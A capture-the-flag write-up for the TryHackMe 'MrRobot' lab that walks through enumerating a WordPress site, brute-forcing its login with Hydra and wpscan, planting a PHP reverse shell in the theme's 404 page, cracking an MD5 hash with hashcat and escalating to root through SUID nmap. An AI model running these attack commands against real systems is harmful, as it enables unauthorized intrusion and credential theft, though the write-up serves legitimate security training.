MrRobot CTF WriteUp
by Zebra
| Room | Date | Difficulty | Type | Time | Own Intention | Machine |
|---|---|---|---|---|---|---|
| MrRobot | 09.11.2020 | Medium | Challenge | 1,5h | Easy | Linux |
Tasks
| Task | Question |
|---|---|
| Task 1.* | Autocomplete |
| Task 2.1 | What is key 1? |
| Task 2.2 | What is key 2? |
| Task 2.3 | What is key 3? |
Introduction
Hello and welcome to the write-up of the room “MrRobot” on tryhackme.
MrRobot is a room marked as medium, but in my opinion its an easy room. First we had a lot of input on http content and an interactive shell. But this is all informatively around the mr Robot world, but not really helpful for our CTF.
So its necessary to enumerate the http service with some tools and poke around. After we find some interesting files and credentials we could get an reverse shell over wordpress. The path to get the credentials of the wp admin panel is split in hydra brute forcing and web enumeration. For priv-escalation we do our normal stuff and find an interesting SUID.
So let’s begin:
Preparation Steps
Scanning and Enumeration
Lets begin with a simple nmap only portscan and sort with a grep command.
Nmap Scan
- Check all open ports
- Get a list with the open ports
- Run a nmap scan on the ports
1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.91 scan initiated Sun Nov 8 18:03:07 2020 as: nmap -Pn -p- -oN nmap/ports 10.10.129.15
Nmap scan report for 10.10.129.15
Host is up (0.00021s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
53/tcp closed domain
80/tcp open http
443/tcp open https
cat ./nmap/ports |grep open | awk -F/ '{print $1}' ORS=','
80,443,
Now we can use this little Portscan to scan the Ports fully.
nmap -A -T4 -p 80,443 $targetIP
Our output shows us the following results:
| Port | Service | Information’s |
|---|---|---|
| 22/tcp | ssh | ssh |
| 80/tcp | http | Apache |
Web Enumeration
Visite web-pages:
Firefox: http://10.10.129.15/
Interactive shell with some cool videos and information’s around mr Robot. But nothing really helpful.
Web directory enumeration:
We could use one of our preferred tools like dirbuster, gobuster or dirsearch.
I will use dirsearch
python3 /home/kali/tools/dirsearch/dirsearch.py -u http://10.10.129.15 -e php,html,txt
Output:
| Path | type | priority | information |
|---|---|---|---|
| /robots.txt | txt | high | hidden paths, usernames, passwords |
| /admin/index.html | html | medium | login page |
| /wp-login.php | wordpress | high | login page |
| /readme.html | html | low | usernames, passwords, hints |
| /blog.php | wordpress | medium | usernames, passwords, hints |
| /license.txt | txt | high | usernames, passwords, hints |
Wp enumeration
Wordpress enumeration with wp scan.
wpscan --url http://10.10.245.239/ --enumerate p | tee wpscan
Get some inforamtions about themes etc.
Text file inspection
Visite : http://10.10.129.15/robots.txt
Visite : http://10.10.129.15/license.txt
When i visite a txt file on a webserver i searched for words like pass, password, user and username.
Robots.txt:
In the robots.txt file we find the file path for Task 2.1.
So show the flag with cat http://10.10.129.15/key-1*****'.txt
And take an interesting list with the name fsocity.dic.
wget http://10.10.129.15/fsocity.dic
When i download i list like this, which looks like a password or username list i do the following command for checking if there are doubled words.
sort fsocity.dic | uniq -d ## check if duplicated ones## check for double words.
sort fsocity.dic | uniq >fsocity_sorted_txt## create new sorted file.
### Task 2.1 solved ###
license.txt (Web enum credential path):
In the license.txt we find at the bottom an interesting string. The “=” at the and is often a hint for a base64 string.
Use the following command for decoding base64:
echo "string" | base64 -d
Cool. We had some credentials to login.
Hydra credential path
If we don’t find the string for the login credentials we could use hydra to brute force the wp-login page.
So lets build the path for this.
Active burp and intercept a login Post.
1
2
3
4
5
6
Host: 10.10.129.15
...
...
...
log=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1POST /wp-login.php HTTP/1.1
Username brute force.
use the last path of our burp output.
hydra -L fsocity_sorted.txt -v -p test 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 30
1
2
3
4
5
6
7
8
hydra -L fsocity_sorted.txt -v -p test 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username" -t 30
[DATA] attacking http-post-form://10.10.129.15:80/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.129.15%2Fwp-admin%2F&testcookie=1:F=Invalid username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 2367.00 tries/min, 2367 tries in 00:01h, 9085 to do in 00:04h, 30 active
[80][http-post-form] host: 10.10.129.15 login: elliot password: test
[80][http-post-form] host: 10.10.129.15 login: ELLIOT password: test
[80][http-post-form] host: 10.10.129.15 login: Elliot password: test
Possible Usernames: elliot, Elliot and ELLIOT. (The name of the main character in MrRobot)
3.) Password brute force
a) wpscan --url http://10.10.129.15 -t 50 -U Elliot -P fsocity_sorted.txt
1
2
3
wpscan --url http://10.10.129.15 -t 50 -U Elliot -P fsocity_sorted.txt
[!] Valid Combinations Found:
| Username: Elliot, Password: ER28-0652
b) hydra -l Elliot -v -P fsocity_sorted.txt 10.10.129.15 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -t 30
Wordpress php exploitation
Now we have the credentials for the wp dashboard and could start to get our exploit running.
Our way to go is to place a php reverse shell on the page. The path for this is on the left side: Appearance/Editor/404.php Edit the 404.php and paste in a reverse shell of pentestmonkey (change to your ip and fav port).
Save the changes and start a listener with:
rlwrap nc -lvnp 9001 (rlwrap Link)
Visit for activation: http://10.10.129.15/404.php
Stabilize:
python -c 'import pty;pty.spwan("/bin/bash")' ctrl-z stty raw -echo fg enter enter export TERM=xterm
Privilege escalation
We do our normal inspection of the system: id, pwd, cat /etc/crontab, cat /etc/passwd #check users and find robot, cd /home/robot
Escalate to robot
We could choose if we escalate to a user or directly to root. I choose the way to escalate to robot first.
1
2
3
4
5
6
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 13 2015 .
drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
The info of this output give us a useful file for escalation, because we could not cat key2 directly.
cat password.raw-md5 and check with hash-identifier: Its an md5 hash.
–
Md5 hash cracking:
Save the md5 hash in a new file (the hash is the string after “robot:”).
I prefer to use crackstation for crack the password but you can also use hashcat:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
Host memory required for this attack: 67 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: c3fcd3d76192e4007dfb496cca67e13b
Time.Started.....: Mon Nov 9 15:32:01 2020 (0 secs)
Time.Estimated...: Mon Nov 9 15:32:01 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3984.3 kH/s (0.55ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 49152/14344385 (0.34%)
Rejected.........: 0/49152 (0.00%)
Restore.Point....: 36864/14344385 (0.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: holabebe -> trudy
Started: Mon Nov 9 15:32:00 2020
Stopped: Mon Nov 9 15:32:02 2020
$ hashcat hash --show
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
Now we have the password and could login to robot with su robot.
SUID for priv escalation
You could upload tools like linpeas or LinEnum or do a manual research first. I like the manual inspection, cause i lear more then let a tool find the escalation path. Try commands like sudo -l and cat /etc/crontab to look for hints. But the right path is the suid one.
Run commands to find SUID:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 69120 Feb 12 2015 /bin/umount
-rwsr-xr-x 1 root root 94792 Feb 12 2015 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 36936 Feb 17 2014 /bin/su
-rwsr-xr-x 1 root root 47032 Feb 17 2014 /usr/bin/passwd
-rwsr-xr-x 1 root root 32464 Feb 17 2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41336 Feb 17 2014 /usr/bin/chsh
-rwsr-xr-x 1 root root 46424 Feb 17 2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 68152 Feb 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 155008 Mar 12 2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 440416 May 12 2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10240 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-r-sr-xr-x 1 root root 9532 Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 10344 Feb 25 2015 /usr/lib/pt_chown
One command is interesting. The nmap command. Lets check GTFobis for escalating.
Nmap SUID escalation:
In the sections “shell” at point “b)” you could fint the right and simple solution to escalate. Lets do this:
1
2
3
4
5
6
robot@linux:~$ /usr/local/bin/nmap -v
/usr/local/bin/nmap -v
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2020-11-09 14:40 UTC
No target machines/networks specified!
QUITTING!
Right Version? Check!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
robot@linux:~$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# find / -type f -name "*key-3-*" 2>/dev/null
find / -type f -name "*key-3-*" 2>/dev/null
/root/key-3-of-3.txt
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
FindTheKeyOnYourOwn
#
ROOOOOOOT!!!!
What we learned:
- Web enumeration with dirsearch
- Wordpress enumeration with wpscan
- Wordpress login brute force with hydra and wpscan
- SUID escalation with nmap